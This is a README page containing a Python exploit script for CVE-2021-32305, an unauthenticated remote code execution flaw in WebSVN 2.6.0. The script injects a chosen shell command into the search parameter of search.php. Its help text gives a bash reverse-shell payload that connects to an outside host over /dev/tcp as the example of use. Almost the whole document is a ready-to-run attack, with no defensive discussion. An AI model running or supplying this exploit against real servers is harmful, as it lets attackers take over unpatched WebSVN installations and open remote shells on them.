README.md
Rendering markdown...
# Exploit Author: FredBrave
# CVE: CVE-2021-32305
# Exploit: Websvn 2.6.0 - RCE (Unauthenticated)
import optparse, requests, sys, urllib, signal
# Functions
def helpPanel():
print("\n\nExample of the use:\n")
print('python3 exploit.py --url http://10.0.2.1/websvn/ --payload "bash -c \'bash -i >& /dev/tcp/10.0.2.2/443 0>&1\'"\n\n\n')
sys.exit(1)
def exiting(sig, frame):
print("\n\n\nExiting of program...")
sys.exit(1)
#Ctrl + C
signal.signal(signal.SIGINT, exiting)
def Getarguments():
parser = optparse.OptionParser()
parser.add_option('--url', dest='target', help='Url Target')
parser.add_option('--payload', dest='payload', help='Command to execute')
(options, arguments) = parser.parse_args()
if not options.target:
helpPanel()
parser.error("[-] Please indicate the url of target --url, for more information... --help")
if not options.payload:
helpPanel()
parser.error("[-] Please indicate the payload --payload, for more information... --help")
return options
def execute(target, payload):
requests.get(target + 'search.php?search=";{};"'.format(payload))
def main():
options = Getarguments()
target = options.target
pay = options.payload
payload = urllib.parse.quote_plus(pay)
execute(target, payload)
if __name__ == '__main__':
main()